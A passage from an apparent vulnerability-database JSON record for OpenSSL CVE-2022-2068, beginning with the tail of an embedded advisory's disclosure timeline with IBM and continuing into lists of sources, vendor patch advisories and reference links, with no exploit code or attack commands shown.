2024: IBM asked me to update ISVA and recheck all the vulnerabilities. \n* Jan 16, 2024: I asked IBM if ibmsecurity was also patched. \n* Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!). \n* Jan 22, 2024: IBM wanted to organize a new meeting. \n* Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago). \n* Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched. \n* Jan 24, 2024: IBM created a new case for ibmsecurity. \n* Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7). \n* Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM. \n* Feb 7, 2024: IBM confirmed that some of the vulnerabilities were \"being processed\" and that some of vulnerabilities had been also silently patched and no security bulletins had been published. \n* Feb 20, 2024: IBM asked for updates. \n* Feb 20, 2024: I asked when would be the release date for ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release. \n* Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024. \n* Feb 23, 2024: I sent a new vulnerability to IBM \"Authentication Bypass on IBM Security Verify Runtime\". \n* Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket. \n* Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open. \n* Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it. \n* Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago and IBM confirmed they had not fully fixed in the latest version and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins. \n* Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone. \n* Feb 28, 2024: I asked IBM to clarify where in the documentation specified that the runtime should not be exposed. For example, in https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime, it was not explained that exposing this runtime on the network was a high security risk. \n* Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability. \n* Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability. \n* Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400. \n* Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416. \n* Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397. \n* Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM. \n* Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416). \n* Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) closed. \n* Apr 6, 2024: I added again the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published. \n* Apr 10, 2024: Security bulletin for ibm security published: https://www.ibm.com/support/pages/node/7147932. \n* Apr 10, 2024: I reached IBM regarding a new security bulletin, with a potential vulnerability I reported https://www.ibm.com/support/pages/node/7145828. \n* Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported. \n* Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8. \n* Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information. \n* Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket. \n* Apr 16, 2024: I confirmed that this ticket can be closed only when the security patches are available. \n* Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024. \n* Apr 17, 2024: I replied that \"It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis.\"\n* May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities. \n* May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM. \n* May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details. \n* May 8, 2024: IBM said they would review the list of vulnerabilities. \n* May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities. \n* May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities under the same CVE identifier and asked to close the ticket. \n* May 20, 2024: IBM asked for my comments on the list of CVEs. \n* May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete. \n* May 21, 2024: IBM provided me with an explanation regarding the missing CVEs. \n* May 21, 2024: I asked IBM to quote their explanation in the security advisory. \n* May 21, 2024: IBM asked to have a meeting. \n* May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs. \n* May 22, 2024: IBM asked to have a meeting to remove any confusion. \n* May 23, 2024: I replied that there\u0027s not much confusion except missing CVEs for silently patched vulnerabilities and lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and indicate the security bulletins with the list of corresponding vulnerabilities. \n* May 24, 2024: IBM stated they would provide me with additional CVEs. \n* May 30, 2024: I confirmed that the creation of additional CVEs is fair. \n* Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356. \n* Jun 3, 2024: I asked IBM the release date of the 10.0.8 version. \n* Jun 3, 2024: IBM confirmed that the exact date was not yet decided. \n* Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities. \n* Jun 8, 2024: I asked IBM the status of a previously patched vulnerability. \n* Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release. \n* Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities. \n* Jun 19, 2024: IBM asked if I needed assistance. \n* Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities. \n* Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin. \n* Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket. \n* Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported. \n* Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket. \n* Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges. \n* Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory. \n* Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided when this vulnerability would be patched. \n* Nov 1, 2024: A security advisory is published. \n\n\n\n## Credits\n\nThese vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec). \n\n\n\n## References\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibmsecurity.txt\n\nhttps://www.ibm.com/support/pages/node/7106586\n\nhttps://www.ibm.com/support/pages/node/7145400\n\nhttps://www.ibm.com/support/pages/node/7155356\n\nhttps://www.ibm.com/support/pages/node/7158790\n\n\n\n## Disclaimer\n\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial\nShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T\nLbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz\neJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe\necOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ\nVR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq\nmPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE\n+NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE\nqz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj\n24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As\n+akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC\nV8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7\nY7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU=\n=3Ax6\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-2068"
},
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "175432"
},
{
"db": "PACKETSTORM",
"id": "170179"
},
{
"db": "PACKETSTORM",
"id": "182466"
}
],
"trust": 1.8
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-2068",
"trust": 2.0
},
{
"db": "SIEMENS",
"id": "SSA-332410",
"trust": 1.1
},
{
"db": "ICS CERT",
"id": "ICSA-22-319-01",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-2068",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168022",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169396",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168112",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170196",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170165",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "175432",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170179",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "182466",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "175432"
},
{
"db": "PACKETSTORM",
"id": "170179"
},
{
"db": "PACKETSTORM",
"id": "182466"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"id": "VAR-202206-1428",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.416330645
},
"last_update_date": "2026-03-09T20:23:37.685000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian Security Advisories: DSA-5169-1 openssl -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=6b57464ee127384d3d853e9cc99cf350"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1626",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1626"
},
{
"title": "Debian CVElist Bug Report Logs: openssl: CVE-2022-2097",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=740b837c53d462fc86f3cb0849b86ca0"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-2068"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1832",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1832"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1831",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1831"
},
{
"title": "Amazon Linux 2: ALASOPENSSL-SNAPSAFE-2023-001",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALASOPENSSL-SNAPSAFE-2023-001"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-2068"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228917 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228913 - Security Advisory"
},
{
"title": "Red Hat: Moderate: openssl security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225818 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Satellite Client security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235982 - Security Advisory"
},
{
"title": "Red Hat: Moderate: openssl security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226224 - Security Advisory"
},
{
"title": "Red Hat: Important: Release of containers for OSP 16.2.z director operator tech preview",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226517 - Security Advisory"
},
{
"title": "Red Hat: Important: Self Node Remediation Operator 0.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226184 - Security Advisory"
},
{
"title": "Red Hat: Important: Satellite 6.11.5.6 async security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235980 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-123",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-123"
},
{
"title": "Red Hat: Important: Satellite 6.12.5.2 Async Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235979 - Security Advisory"
},
{
"title": "Red Hat: Critical: Multicluster Engine for Kubernetes 2.0.2 security and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226422 - Security Advisory"
},
{
"title": "Brocade Security Advisories: Access Denied",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=8efbc4133194fcddd0bca99df112b683"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.11.1 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226103 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-195",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-195"
},
{
"title": "Red Hat: Important: Node Maintenance Operator 4.11.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226188 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Openshift Logging Security and Bug Fix update (5.3.11)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226182 - Security Advisory"
},
{
"title": "Red Hat: Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226051 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh 2.2.2 Containers security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226283 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Logging Subsystem 5.4.5 Security and Bug Fix Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226183 - Security Advisory"
},
{
"title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.5.2 security fixes and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226507 - Security Advisory"
},
{
"title": "Red Hat: Moderate: RHOSDT 2.6.0 operator/operand containers Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227055 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift sandboxed containers 1.3.1 security fix and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227058 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228840 - Security Advisory"
},
{
"title": "Red Hat: Moderate: New container image for Red Hat Ceph Storage 5.2 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226024 - Security Advisory"
},
{
"title": "Red Hat: Moderate: RHACS 3.72 enhancement and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226714 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.1.0 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226290 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security and container updates",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226348 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Multicluster Engine for Kubernetes 2.1 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226345 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228841 - Security Advisory"
},
{
"title": "Red Hat: Moderate: RHSA: Submariner 0.13 - security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226346 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.0.4 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226430 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226370 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.12 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226271 - Security Advisory"
},
{
"title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.4.6 security update and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226696 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Data Foundation 4.11.0 security, enhancement, \u0026 bugfix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226156 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Virtualization 4.11.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228750 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.11.0 Images security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226526 - Security Advisory"
},
{
"title": "Red Hat: Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226429 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.12.0 Images security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230408 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Openshift Logging 5.3.14 bug fix release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228889 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Logging Subsystem 5.5.5 - Red Hat OpenShift security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228781 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.11.0 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225069 - Security Advisory"
},
{
"title": "Smart Check Scan-Report",
"trust": 0.1,
"url": "https://github.com/mawinkler/c1-cs-scan-result "
},
{
"title": "Repository with scripts to verify system against CVE",
"trust": 0.1,
"url": "https://github.com/backloop-biz/Vulnerability_checker "
},
{
"title": "https://github.com/jntass/TASSL-1.1.1",
"trust": 0.1,
"url": "https://github.com/jntass/TASSL-1.1.1 "
},
{
"title": "Repository with scripts to verify system against CVE",
"trust": 0.1,
"url": "https://github.com/backloop-biz/CVE_checks "
},
{
"title": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories",
"trust": 0.1,
"url": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories "
},
{
"title": "OpenSSL-CVE-lib",
"trust": 0.1,
"url": "https://github.com/chnzzh/OpenSSL-CVE-lib "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/06/27/openssl_304_memory_corruption_bug/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://www.debian.org/security/2022/dsa-5169"
},
{
"trust": 1.1,
"url": "https://www.openssl.org/news/secadv/20220621.txt"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
},
{
"trust": 1.1,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
},
{
"trust": 1.1,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
},
{
"trust": 1.1,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6wzzbkuhqfgskgnxxkicsrpl7amvw5m5/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/vcmnwkerpbkoebnl7clttx3zzczlh7xa/"
},
{
"trust": 1.0,
"url": "https://gitlab.com/fraf0/cve-2022-1292-re_score-analysis"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2024/nov/0"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-1292"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-2068"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-2097"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1586"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1785"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1897"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1927"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-37434"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30631"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-34903"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-3709"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
},
{
"trust": 0.2,
